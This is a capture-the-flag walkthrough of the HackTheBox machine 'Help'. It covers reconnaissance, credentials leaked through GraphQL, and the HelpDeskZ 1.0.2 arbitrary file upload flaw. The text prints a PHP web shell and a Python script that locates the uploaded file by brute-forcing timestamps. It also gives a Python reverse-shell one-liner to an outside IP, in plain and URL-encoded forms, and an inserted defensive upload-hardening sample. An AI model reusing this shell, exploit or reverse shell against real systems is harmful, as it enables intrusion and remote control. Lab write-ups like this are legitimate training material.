HackTheBox Writeups

Writeups for all the HTB boxes I have solved


Help


Machine URL: https://www.hackthebox.eu/home/machines/profile/170

Machine IP: 10.10.10.121

DATE : 3/05/2019

START TIME: 9:50 AM


Nmap scan

[Screenshot: Nmap scan output]

Nothing unusual is going on here: just the basic ports, plus port 3000 running another website written in Node.

Let's enumerate both of those websites and see what we find.

dirsearch

[Screenshot: dirsearch output]

So there's a javascript folder, but when we try to open it we get a 403 error, meaning we are forbidden from accessing its content.

But we can open the /support/ URL.

Let's see what we find on port 3000, i.e. the Node.js website.

[Screenshot: dirsearch output for port 3000]

Port 3000 looks like it is hosting an API, and two URLs have been found.

Getting Credentials

If we visit http://10.10.10.121:3000/ we get the following data:

➜ http http://10.10.10.121:3000/ | jq .
{
  "message": "Hi Shiv, To get access please find the credentials with given query"
}

We learn one thing from this: there's a user (maybe an admin?) named Shiv.

Now, visiting /graphql, we get:

➜ http http://10.10.10.121:3000/graphql
HTTP/1.1 400 Bad Request
Connection: keep-alive
Date: Fri, 03 May 2019 04:57:46 GMT
Transfer-Encoding: chunked
X-Powered-By: Express

GET query missing.

So we can use this GraphQL endpoint to query for more information about the user and password.

Cracking the hash 5d3c93182bb20f07b994a7f617e99cff gives godhelpmeplz.

CREDENTIALS: helpme@helpme.com:godhelpmeplz

NOTE: How did I find it on the first try? Read: https://github.com/Anonyme1396/security-tips/blob/master/web.md#exploiting-2

File Upload Vulnerability

A simple Google search for "Helpdeskz exploit" turns up HelpDeskZ 1.0.2 - Arbitrary File Upload.

This means we can upload a file and then use the exploit to find the location of the uploaded file.

I uploaded a backdoor.php:

<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>

When you submit the file, you may get an error saying "File is not allowed". This threw me off at first, so I decided to go through the HelpDeskZ source code, since it is an open source application.

After looking around I found a file in include/parser called new-ticket.php.

After the file is uploaded, it performs a check on $fileinfo by passing that value to a verifyAttachment function. Let's take a look at this function.

This function performs multiple checks on the file, but there isn't any file extension check. This means the error we are getting, i.e. "File not allowed", is meaningless and we can totally ignore it.
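As an added defensive counterpart (not code from the writeup, the exploit or HelpDeskZ itself), here are the two root causes side by side: the storage name derived from md5(original filename + upload timestamp) that the exploit in the next section enumerates, and a hardened handler that rejects the upload by extension before anything is written and stores accepted files under an unguessable name. The allowlist, the executable-extension set and the function names are assumptions.

```python
import hashlib
import secrets
from pathlib import PurePosixPath
from typing import Optional

# Constructed policy for a hypothetical hardened ticket-attachment handler.
ALLOWED_EXTENSIONS = {"txt", "pdf", "png", "jpg", "jpeg", "gif", "zip"}
# Extensions a PHP-enabled web server may execute even when they are not last
# (e.g. "shell.php.png" under Apache's multi-extension handling).
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar"}


def legacy_storage_name(filename: str, unix_time: int) -> str:
    """The HelpDeskZ-style scheme the exploit enumerates: the stored name is
    md5(original filename + upload timestamp) with the original extension kept,
    so anyone who knows the filename can regenerate it from a small time window."""
    ext = filename.split(".")[-1]
    digest = hashlib.md5((filename + str(unix_time)).encode("utf-8")).hexdigest()
    return "{}.{}".format(digest, ext)


def extension_allowed(filename: str) -> bool:
    """Decide BEFORE anything is written to disk, using only the name.
    Directory components are dropped, the final extension must be on the
    allowlist, and no earlier extension may be an executable one."""
    name = PurePosixPath(filename.replace("\\", "/")).name
    parts = name.lower().split(".")
    if len(parts) < 2 or "" in parts:  # no extension, or a dotfile / empty part
        return False
    if parts[-1] not in ALLOWED_EXTENSIONS:
        return False
    return not any(p in EXECUTABLE_EXTENSIONS for p in parts[1:-1])


def hardened_storage_name(filename: str) -> Optional[str]:
    """Return an unguessable on-disk name, or None if the upload must be rejected.
    The name carries no information about the original filename or upload time."""
    if not extension_allowed(filename):
        return None
    ext = filename.lower().rsplit(".", 1)[-1]
    return "{}.{}".format(secrets.token_hex(16), ext)
```

Storing attachments outside the web root, so that even an accepted file is never served for execution, is the complementary fix that this naming change does not replace.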

Exploit

One of my friends suggested using the exploit from 0day:

import requests
import hashlib
from time import time


def md5(data):
    return hashlib.md5(data.encode("utf-8")).hexdigest()


def get(base, filename, at):
    # HelpDeskZ stores an attachment as md5(original filename + upload unix
    # timestamp) with the original extension kept, under uploads/tickets/.
    uploaded_file = "{}/uploads/tickets/{}.{}".format(
        base.rstrip("/"), md5(filename + str(at)), filename.split(".")[-1]
    )

    r = requests.get(uploaded_file)
    if r.status_code == 200:
        return uploaded_file


def main():
    # Try every timestamp in the last 1000 seconds until the file is found.
    for i in range(1000):
        url = get("http://10.10.10.121/support/", "backdoor.php", int(time() - i))
        if url is not None:
            print(url)
            return
    print("Oops ... not found")


if __name__ == "__main__":
    main()

Since there's some timezone issue with HelpDeskZ, I decided to change the timezone.

Then I ran the exploit and got the path to the file:

http://10.10.10.121/support/uploads/tickets/84c045a6c4cccf0880fc139c6ba7599a.php

PWN USER

whoami

This is how we get user.

PWN root

Now, first we need a reverse shell to get into the machine. I tried passing:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

but for some reason this didn't work, so I encoded everything and then tried it again:

http://10.10.10.121/support/uploads/tickets/84c045a6c4cccf0880fc139c6ba7599a.php?cmd="python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%2210.10.12.139%22%2C4444))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27"

With this I got the reverse shell.

Then I spawned a pty shell:

python -c 'import pty; pty.spawn("/bin/sh")'

After that I enumerated with the help of LinEnum and found that the kernel was vulnerable to a local privilege escalation exploit.

So I downloaded the exploit, compiled it and ran it. This gives you a root shell. Then you can simply cat /root/root.txt:

b7fe6082dcdf0c1b1eXXXXXXXXXXXXXXX